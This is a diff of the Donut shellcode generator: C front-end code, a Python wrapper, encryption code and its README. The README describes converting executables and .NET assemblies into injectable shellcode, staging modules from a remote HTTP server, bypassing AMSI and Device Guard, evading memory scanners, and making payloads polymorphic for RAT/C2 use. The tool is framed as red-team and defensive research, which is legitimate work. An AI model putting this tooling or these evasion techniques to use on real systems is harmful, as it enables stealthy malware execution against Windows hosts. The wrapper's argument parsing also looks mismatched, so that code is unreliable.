2200 get_opt(argc, argv, OPT_TYPE_STRING, c.decoy, "j", "decoy", NULL);
2201 get_opt(argc, argv, OPT_TYPE_STRING, c.output, "o", "output", NULL);
2202 get_opt(argc, argv, OPT_TYPE_STRING, c.args, "p", "params;args", NULL);
2203 get_opt(argc, argv, OPT_TYPE_STRING, c.runtime, "r", "runtime", NULL);
2204 get_opt(argc, argv, OPT_TYPE_STRING, c.server, "s", "server", NULL);
2205 get_opt(argc, argv, OPT_TYPE_FLAG, &c.thread, "t", "thread", NULL);
2206 get_opt(argc, argv, OPT_TYPE_FLAG, &c.unicode, "w", "unicode", NULL);
2207 get_opt(argc, argv, OPT_TYPE_DEC, &c.exit_opt,"x", "exit", validate_exit);
2208 get_opt(argc, argv, OPT_TYPE_HEX64, &c.oep, "y", "oep;fork", NULL);
2209 get_opt(argc, argv, OPT_TYPE_DEC, &c.compress,"z", "compress", NULL);
12772210
12782211 // no file? show usage and exit
1279 if(c.file[0] == 0) {
2212 if(c.input[0] == 0) {
12802213 usage();
12812214 }
12822215
1283 // generate payload from configuration
2216 // server specified?
2217 if(c.server[0] != 0) {
2218 c.inst_type = DONUT_INSTANCE_HTTP;
2219 }
2220
2221 // generate loader from configuration
12842222 err = DonutCreate(&c);
1285
1286 if(err != DONUT_ERROR_SUCCESS) {
1287 printf(" [ Error : %s\n", err2str(err));
2223
2224 if(err != DONUT_ERROR_OK) {
2225 printf(" [ Error : %s\n", DonutError(err));
12882226 return 0;
12892227 }
12902228
13072245 case DONUT_MODULE_JS:
13082246 mod_type = "JScript";
13092247 break;
1310 case DONUT_MODULE_XSL:
1311 mod_type = "XSL";
1312 break;
13132248 default:
13142249 mod_type = "Unrecognized";
13152250 break;
13162251 }
2252
13172253 printf(" [ Instance type : %s\n", inst_type[c.inst_type - 1]);
1318 printf(" [ Module file : \"%s\"\n", c.file );
2254 printf(" [ Module file : \"%s\"\n", c.input);
2255 printf(" [ Entropy : %s\n",
2256 c.entropy == DONUT_ENTROPY_NONE ? "None" :
2257 c.entropy == DONUT_ENTROPY_RANDOM ? "Random Names" : "Random names + Encryption");
2258
2259 if(c.compress != DONUT_COMPRESS_NONE) {
2260 printf(" [ Compressed : %s (Reduced by %"PRId32"%%)\n",
2261 c.compress == DONUT_COMPRESS_APLIB ? "aPLib" :
2262 c.compress == DONUT_COMPRESS_LZNT1 ? "LZNT1" : "Xpress",
2263 file_diff(c.zlen, c.len));
2264 }
2265
13192266 printf(" [ File type : %s\n", mod_type);
13202267
13212268 // if this is a .NET DLL, display the class and method
13222269 if(c.mod_type == DONUT_MODULE_NET_DLL) {
13232270 printf(" [ Class : %s\n", c.cls );
13242271 printf(" [ Method : %s\n", c.method);
2272 printf(" [ Domain : %s\n",
2273 c.domain[0] == 0 ? "Default" : c.domain);
13252274 } else
13262275 if(c.mod_type == DONUT_MODULE_DLL) {
13272276 printf(" [ Function : %s\n",
13282277 c.method[0] != 0 ? c.method : "DllMain");
13292278 }
2279
13302280 // if parameters supplied, display them
1331 if(c.param[0] != 0) {
1332 printf(" [ Parameters : %s\n", c.param);
2281 if(c.args[0] != 0) {
2282 printf(" [ Parameters : %s\n", c.args);
13332283 }
13342284 printf(" [ Target CPU : %s\n", arch_str[c.arch - 1]);
13352285
1336 if(c.inst_type == DONUT_INSTANCE_URL) {
2286 if(c.inst_type == DONUT_INSTANCE_HTTP) {
13372287 printf(" [ Module name : %s\n", c.modname);
1338 printf(" [ Upload to : %s\n", c.url);
2288 printf(" [ Upload to : %s\n", c.server);
13392289 }
13402290
13412291 printf(" [ AMSI/WDLP : %s\n",
1342 c.bypass == DONUT_BYPASS_SKIP ? "skip" :
1343 c.bypass == DONUT_BYPASS_ABORT ? "abort" : "continue");
1344
1345 printf(" [ Shellcode : \"%s\"\n\n", payload);
1346 fd = fopen(payload, "wb");
1347
1348 if(fd != NULL) {
1349 fwrite(c.pic, sizeof(char), c.pic_len, fd);
1350 fclose(fd);
1351 } else {
1352 printf(" [ Error opening \"%s\" for payload.\n", payload);
1353 }
1354 // release resources
2292 c.bypass == DONUT_BYPASS_NONE ? "none" :
2293 c.bypass == DONUT_BYPASS_ABORT ? "abort" : "continue");
2294
2295 printf(" [ PE Headers : %s\n",
2296 c.headers == DONUT_HEADERS_OVERWRITE ? "overwrite" :
2297 c.headers == DONUT_HEADERS_KEEP ? "keep" : "Undefined");
2298
2299 printf(" [ Shellcode : \"%s\"\n", c.output);
2300 if(c.oep != 0) {
2301 printf(" [ OEP : 0x%"PRIX64"\n", c.oep);
2302 }
2303
2304 // if decoy supplied, display the path
2305 if(c.decoy[0] != 0) {
2306 printf(" [ Decoy path : %s\n", c.decoy);
2307 }
2308
2309 printf(" [ Exit : %s\n",
2310 c.exit_opt == DONUT_OPT_EXIT_THREAD ? "Thread" :
2311 c.exit_opt == DONUT_OPT_EXIT_PROCESS ? "Process" : "Undefined");
13552312 DonutDelete(&c);
13562313 return 0;
13572314 }
13582315 #endif
2316
+0
-264
donut_shellcode.egg-info/PKG-INFO less more
0 Metadata-Version: 2.1
1 Name: donut-shellcode
2 Version: 0.9.2
3 Summary: Donut Python C extension
4 Home-page: https://github.com/TheWover/donut
5 Author: TheWover, Odzhan, byt3bl33d3r
6 License: UNKNOWN
7 Description: # Using Donut
8
9 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
10
11 Version: 0.9.2 *please submit issues and requests for v1.0 release*
12
13 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
14
15 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
16
17 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
18
19 ## Introduction
20
21 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
22
23 It can be used in several ways.
24
25 ## As a Standalone Tool
26
27 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
28
29 ```
30
31 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
32
33 -MODULE OPTIONS-
34
35 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
36 -u <URL> HTTP server that will host the donut module.
37
38 -PIC/SHELLCODE OPTIONS-
39
40 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
41 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
42 -o <payload> Output file. Default is "payload.bin"
43
44 -DOTNET OPTIONS-
45
46 -c <namespace.class> Optional class name. (required for .NET DLL)
47 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
48 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
49 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
50 -d <name> AppDomain name to create for .NET. Randomly generated by default.
51
52 examples:
53
54 donut -f c2.dll
55 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
56 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
57
58 ```
59
60 ### Building Donut
61
62 Tags have been provided for each release version of donut that contain the compiled executables.
63
64 * v0.9.2, Bear Claw:
65 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
66 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
67 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
68
69 However, you may also clone and build the source yourself using the provided makefiles.
70
71 ## Building From Repository
72
73 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
74
75 ```
76 git clone http://github.com/thewover/donut
77 cd donut
78 ```
79
80 ## Linux
81
82 Simply run make to generate an executable, static and dynamic libraries.
83
84 ```
85 make
86 make clean
87 make debug
88 ```
89
90 ## Windows
91
92 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
93
94 ```
95 nmake -f Makefile.msvc
96 nmake clean -f Makefile.msvc
97 nmake debug -f Makefile.msvc
98 ```
99
100 ## As a Library
101
102 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
103
104 ## As a Python Module
105
106 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
107
108 ```
109 pip install .
110 ```
111
112 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
113
114 ```
115 pip install donut-shellcode
116 ```
117
118 ## As a Template - Rebuilding the shellcode
119
120 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
121
122 ### Microsoft Visual Studio
123
124 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
125
126 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
127
128 ```
129 nmake clean -f Makefile.msvc
130 nmake -f Makefile.msvc
131 ```
132
133 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
134
135 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
136
137 ```
138 nmake clean -f Makefile.msvc
139 nmake x86 -f Makefile.msvc
140 ```
141
142 This will save the shellcode as a C array to *payload_exe_x86.h*.
143
144 ### Mingw-w64
145
146 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
147
148 ```
149 make clean -f Makefile.mingw
150 make -f Makefile.mingw
151 ```
152
153 Once you've recompiled for all architectures, you may rebuild donut.
154
155 ## Bypasses
156
157 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
158
159 * AMSI in .NET v4.8
160 * Device Guard policy preventing dynamicly generated code from executing
161
162 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
163
164 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
165
166 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
167
168 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
169
170 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
171
172 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
173
174 ### Additional features.
175
176 These are left as exercises to the reader. I would personally recommend:
177
178 * Add environmental keying
179 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
180 * Integrate donut as a module into your favorite RAT/C2 Framework
181
182 ## Disclaimers
183
184 * No, we will not update donut to counter signatures or detections by any AV.
185 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
186
187 # How it works
188
189 ## Procedure for Assemblies
190
191 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
192
193 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
194
195 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
196
197 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
198
199 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
200
201 ## Procedure for ActiveScript/XSL
202
203 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
204
205 ## Procedure for PE Loading
206
207 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
208
209 ## Components
210
211 Donut contains the following elements:
212
213 * donut.c: The source code for the donut payload generator
214 * donut.exe: The compiled payload generator as an EXE
215 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
216 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
217 * setup.py: The setup file for installing Donut as a Pip Python3 module.
218 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
219 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
220 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
221 * payload/payload.c: Main file for the shellcode.
222 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
223 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
224 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
225 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
226 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
227 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
228 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
229 * payload/http_client.c: Downloads a module from remote staging server into memory.
230 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
231 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
232 * payload/inject.exe: The compiled C shellcode injector
233 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
234 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
235 * payload/runsc.exe: The compiled C shellcode runner
236 * payload/exe2h/exe2h.c: Source code for exe2h
237 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
238 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
239 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
240
241 # Subprojects
242
243 There are three companion projects provided with donut:
244
245 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
246 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
247 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
248 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
249
250 # Project plan
251
252 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
253 * Create a C# version of the generator.
254 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
255 * Add support for HTTP proxies.
256 ~~* Find ways to simplify the shellcode if possible.~~
257 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
258 * ~~Dynamic Calls to DLL functions.~~
259 * Handle the ProcessExit event from AppDomain using unmanaged code.
260
261 Platform: UNKNOWN
262 Requires-Python: >=3.0
263 Description-Content-Type: text/markdown
+0
-103
donut_shellcode.egg-info/SOURCES.txt less more
0 LICENSE
1 MANIFEST.in
2 Makefile
3 Makefile.mingw
4 Makefile.msvc
5 README.md
6 donut.c
7 donutmodule.c
8 encrypt.c
9 hash.c
10 setup.py
11 version-release-notes.txt
12 ./donut.c
13 ./donutmodule.c
14 ./encrypt.c
15 ./hash.c
16 ./DonutTest/hello.c
17 ./DonutTest/testcase.c
18 ./include/mmap-windows.c
19 ./payload/activescript.c
20 ./payload/bypass.c
21 ./payload/clib.c
22 ./payload/getpc.c
23 ./payload/http_client.c
24 ./payload/inject.c
25 ./payload/inmem_dotnet.c
26 ./payload/inmem_pe.c
27 ./payload/inmem_script.c
28 ./payload/inmem_xsl.c
29 ./payload/payload.c
30 ./payload/peb.c
31 ./payload/runsc.c
32 ./payload/wscript.c
33 ./payload/exe2h/exe2h.c
34 ./payload/exe2h/mmap-windows.c
35 ./payload/test/api_test.c
36 ./payload/test/call_api_dll.c
37 ./payload/test/hello.c
38 docs/2019-08-21-Python_Extension.md
39 docs/2019-5-31-Apple-Fritter.md
40 docs/2019-5-9-Introducing-Donut.md
41 docs/api.html
42 docs/api.md
43 donut_shellcode.egg-info/PKG-INFO
44 donut_shellcode.egg-info/SOURCES.txt
45 donut_shellcode.egg-info/dependency_links.txt
46 donut_shellcode.egg-info/top_level.txt
47 donut_shellcode.egg-info/zip-safe
48 include/donut.h
49 include/encrypt.h
50 include/hash.h
51 include/mmap-windows.c
52 include/mmap.h
53 include/pe.h
54 include/poppack.h
55 include/pshpack1.h
56 include/pshpack2.h
57 include/pshpack4.h
58 include/pshpack8.h
59 include/wintypes.h
60 lib/donut.h
61 payload/Makefile.mingw
62 payload/Makefile.msvc
63 payload/activescript.c
64 payload/activescript.h
65 payload/amsi.h
66 payload/bypass.c
67 payload/call_api.asm
68 payload/call_api_bin.h
69 payload/clib.c
70 payload/clr.h
71 payload/getpc.c
72 payload/http_client.c
73 payload/inject.c
74 payload/inmem_dotnet.c
75 payload/inmem_pe.c
76 payload/inmem_script.c
77 payload/inmem_xsl.c
78 payload/order.txt
79 payload/payload.c
80 payload/payload.h
81 payload/payload_exe_x64.h
82 payload/payload_exe_x86.h
83 payload/peb.c
84 payload/peb.h
85 payload/runsc.c
86 payload/winapi.h
87 payload/wscript.c
88 payload/wscript.h
89 payload/xmldom.h
90 payload/exe2h/Makefile
91 payload/exe2h/Makefile.mingw
92 payload/exe2h/Makefile.msvc
93 payload/exe2h/exe2h.c
94 payload/exe2h/exe2h.obj
95 payload/exe2h/mmap-windows.c
96 payload/exe2h/mmap-windows.obj
97 payload/exe2h/mmap.h
98 payload/test/api_test.c
99 payload/test/call_api_dll.c
100 payload/test/hello.c
101 payload/test/hello.cs
102 payload/test/rdt.cpp
+0
-1
donut_shellcode.egg-info/dependency_links.txt less more
0
+0
-1
donut_shellcode.egg-info/top_level.txt less more
0 donut
+0
-1
donut_shellcode.egg-info/zip-safe less more
0
+137
-69
donutmodule.c less more
3030 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
3131 */
3232
33 #define PY_SSIZE_T_CLEAN
3334 #include <Python.h>
3435 #include "donut.h"
3536
36
3737 static PyObject *Donut_Create(PyObject *self, PyObject *args, PyObject *keywds) {
38 int *arch = NULL;
39 int *bypass = NULL;
40 char *appdomain = NULL;
41 char *file = NULL;
42 char *runtime = NULL;
43 char *url = NULL;
44 char *cls = NULL;
45 char *method = NULL;
46 char *params = NULL;
47
48 int err;
49
50 static char *kwlist[] = {"file", "url", "arch", "bypass", "cls", "method", "params", "runtime", "appdomain", NULL};
51 if (!PyArg_ParseTupleAndKeywords(args, keywds, "s|siisssss", kwlist, &file, &url, &arch, &bypass, &cls, &method, &params, &runtime, &appdomain)) {
38 char *input = NULL; // input file to execute in-memory
39
40 int arch = 0; // target CPU architecture or mode
41 int bypass = 0; // AMSI/WDLP bypassing behavior
42 int headers = 0; // Preserve PE headers behavior
43 int compress = 0; // compress input file
44 int entropy = 0; // whether to randomize API hashes and use encryption
45 int format = 0; // output format
46 int exit_opt = 0; // exit process or exit thread
47 int thread = 0; // run unmanaged entrypoint as a thread
48 char *oep = NULL; // creates new thread for loader and continues execution at specified address provided in hexadecimal format
49
50 char *output = NULL; // name of loader stored on disk
51
52 char *runtime = NULL; // runtime version
53 char *domain = NULL; // app domain name to use
54 char *cls = NULL; // class name
55 char *method = NULL; // method name
56
57 char *params = NULL; // parameters for method
58 int unicode = 0; // param is converted to unicode before being passed to unmanaged DLL function
59
60 char *decoy = NULL; // path of decoy module
61
62 char *server = NULL; // HTTP server to download module from
63 char *modname = NULL; // name of module stored on HTTP server
64
65 static char *kwlist[] = {
66 "file", "arch", "bypass", "headers", "compress", "entropy",
67 "format", "exit_opt", "thread", "oep", "output",
68 "runtime", "appdomain", "cls", "method", "params",
69 "unicode", "server", "url", "modname", NULL};
70
71 if (!PyArg_ParseTupleAndKeywords(
72 args, keywds, "s|iiiiiiiisssssssissss", kwlist, &input, &arch,
73 &bypass, &headers, &compress, &entropy, &format, &exit_opt, &thread,
74 &oep, &output, &runtime, &domain, &cls, &method, &params, &unicode,
75 &decoy, &server, &server, &modname))
76 {
5277 return NULL;
5378 }
5479
5681
5782 // zero initialize configuration
5883 memset(&c, 0, sizeof(c));
59
60 // default type is position independent code for dual-mode (x86 + amd64)
61 c.inst_type = DONUT_INSTANCE_PIC;
62 c.arch = DONUT_ARCH_X84;
63 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
64
84
85 // default settings
86 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
87 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
88 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
89 c.headers = DONUT_HEADERS_OVERWRITE;// overwrite PE header
90 c.format = DONUT_FORMAT_BINARY; // default output format
91 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
92 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
93 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
94 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
95
96 // input file
97 if(input != NULL) {
98 strncpy(c.input, input, DONUT_MAX_NAME - 1);
99 }
100
65101 // target cpu architecture
66 if (arch != NULL) {
102 if(arch != 0) {
67103 c.arch = arch;
68104 }
69
70105 // bypass options
71 if (bypass != NULL) {
106 if(bypass != 0) {
72107 c.bypass = bypass;
73108 }
74
75 // name of appdomain to use
76 if (appdomain != NULL) {
77 strncpy(c.domain, appdomain, DONUT_MAX_NAME - 1);
78 }
79
80 // assembly to use
81 if (file != NULL) {
82 strncpy(c.file, file, DONUT_MAX_NAME - 1);
83 }
84
85 //runtime version to use
86 if (runtime != NULL) {
109 // headers options
110 if(headers != 0) {
111 c.headers = headers;
112 }
113 // class of .NET assembly
114 if(cls != NULL) {
115 strncpy(c.cls, cls, DONUT_MAX_NAME - 1);
116 }
117 // name of domain to use for .NET assembly
118 if(domain != NULL) {
119 strncpy(c.domain, domain, DONUT_MAX_NAME - 1);
120 }
121 // encryption options
122 if(entropy != 0) {
123 c.entropy = entropy;
124 }
125 // output format
126 if(format != 0) {
127 c.format = format;
128 }
129 // method of .NET assembly
130 if(method != NULL) {
131 strncpy(c.method, method, DONUT_MAX_NAME - 1);
132 }
133 // module name
134 if(modname != NULL) {
135 strncpy(c.modname, modname, DONUT_MAX_NAME - 1);
136 }
137 // output file for loader
138 if(output != NULL) {
139 strncpy(c.output, output, DONUT_MAX_NAME - 1);
140 }
141 // parameters to method, DLL function or command line for unmanaged EXE
142 if(params != NULL) {
143 strncpy(c.args, params, DONUT_MAX_NAME - 1);
144 }
145 // path of decoy file
146 if(decoy != NULL) {
147 strncpy(c.decoy, decoy, 2048);
148 }
149 // runtime version to use for .NET DLL / EXE
150 if(runtime != NULL) {
87151 strncpy(c.runtime, runtime, DONUT_MAX_NAME - 1);
88152 }
89
90 // url of remote assembly
91 if (url != NULL) {
92 strncpy(c.url, url, DONUT_MAX_URL - 2);
93 c.inst_type = DONUT_INSTANCE_URL;
94 }
95
96 // class
97 if (cls != NULL) {
98 strncpy(c.cls, cls, DONUT_MAX_NAME - 1);
99 }
100
101 // method or exported api symbol
102 if (method != NULL) {
103 strncpy(c.method, method, DONUT_MAX_NAME - 1);
104 }
105
106 // parameters to method/exported API
107 if (params != NULL) {
108 strncpy(c.param, params, sizeof(c.param) - 1);
109 }
110
111 err = DonutCreate(&c);
112
113 /*
114 if (!(c.pic_len > 0)) {
115 return NULL;
116 }
117 */
153 // run entrypoint of unmanaged EXE as a thread
154 if(thread != 0) {
155 c.thread = 1;
156 }
157 // server
158 if(server != NULL) {
159 strncpy(c.server, server, DONUT_MAX_NAME - 2);
160 c.inst_type = DONUT_INSTANCE_HTTP;
161 }
162 // convert param to unicode? only applies to unmanaged DLL function
163 if(unicode != 0) {
164 c.unicode = 1;
165 }
166 // call RtlExitUserProcess to terminate host process
167 if(exit_opt != 0) {
168 c.exit_opt = exit_opt;
169 }
170 // fork a new thread and execute address of original entry point
171 if(oep != NULL) {
172 c.oep = strtoull(oep, NULL, 16);
173 }
174 // pack/compress input file
175 if(compress != 0) {
176 c.compress = compress;
177 }
178
179 int err = DonutCreate(&c);
180
181 if(err != 0) {
182 PyErr_SetString(PyExc_RuntimeError, DonutError(err));
183 DonutDelete(&c);
184 return NULL;
185 }
118186
119187 PyObject *shellcode = Py_BuildValue("y#", c.pic, c.pic_len);
120188
130198 Donut_Create, // C wrapper function
131199 METH_VARARGS|METH_KEYWORDS,
132200 "Calls DonutCreate to generate shellcode for a .NET assembly" // documentation
133 }, {
134 NULL, NULL, 0, NULL
135 }
201 },
202
203 {NULL, NULL, 0, NULL}
136204 };
137205
138206 // modules definition
+85
-11
encrypt.c less more
3030
3131 #include "encrypt.h"
3232
33 #include <stdio.h>
34 #include <string.h>
35
3336 static void chaskey(void *mk, void *p) {
3437 uint32_t i,*w=p,*k=mk;
3538
5356 }
5457
5558 // encrypt/decrypt data in counter mode
56 void donut_encrypt(void *mk, void *ctr, void *data, size_t len) {
59 void donut_encrypt(void *mk, void *ctr, void *data, uint32_t len) {
5760 uint8_t x[CIPHER_BLK_LEN],
5861 *p=(uint8_t*)data,
5962 *c=(uint8_t*)ctr;
60 int i, r;
63 uint32_t i, r;
6164
6265 while(len) {
6366 // copy counter+nonce to local buffer
7780 len -= r; p += r;
7881
7982 // update counter
80 for(i=CIPHER_BLK_LEN;i>0;i--)
83 for(i=CIPHER_BLK_LEN;(int)i>0;i--)
8184 if(++c[i-1]) break;
8285 }
8386 }
8487
8588 #ifdef TEST
8689
90 #include <stdint.h>
8791 #include <stdio.h>
92 #include <stdlib.h>
8893 #include <string.h>
89 #include <stdint.h>
94 #include <sys/stat.h>
95 #include <inttypes.h>
96 #include <fcntl.h>
97
98 #if defined(_WIN32) || defined(_WIN64)
99 #define WINDOWS
100 #include <windows.h>
101 #pragma comment(lib, "advapi32.lib")
102 #else
103 #include <unistd.h>
104 #endif
105
106 void bin2hex(const char *str, void *bin, int len) {
107 int i;
108 uint8_t *p = (uint8_t*)bin;
109
110 printf("%s[%i] = { ", str, len);
111
112 for(i=0;i<len;i++) {
113 printf("0x%02x", p[i]);
114 if((i+1) != len) putchar(',');
115 }
116 printf(" };\n");
117 }
118
119 // generate test vector
120 void gen_crypto_tv(void *mk, void *ctr) {
121 uint8_t key[16], data[77], tmp[16];
122 int i, j;
123
124 memset(data, 0, sizeof(data));
125 memcpy(key, mk, 16);
126 memcpy(tmp, ctr, 16);
127
128 for(i=0; i<128; i++) {
129 donut_encrypt(key, tmp, data, sizeof(data));
130 // update key with first 16 bytes of ciphertext
131 for(j=0; j<16; j++) key[j] ^= data[j];
132 }
133 bin2hex("donut_crypt_tv", data, 16);
134 }
90135
91136 // 128-bit master key
92 uint8_t key[16] =
137 uint8_t key_tv[16] =
93138 { 0x56, 0x09, 0xe9, 0x68, 0x5f, 0x58, 0xe3, 0x29,
94139 0x40, 0xec, 0xec, 0x98, 0xc5, 0x22, 0x98, 0x2f };
95140
96141 // 128-bit plain text
97 uint8_t plain[16]=
142 uint8_t plain_tv[16]=
98143 { 0xb8, 0x23, 0x28, 0x26, 0xfd, 0x5e, 0x40, 0x5e,
99144 0x69, 0xa3, 0x01, 0xa9, 0x78, 0xea, 0x7a, 0xd8 };
100145
101146 // 128-bit cipher text
102 uint8_t cipher[16] =
147 uint8_t cipher_tv[16] =
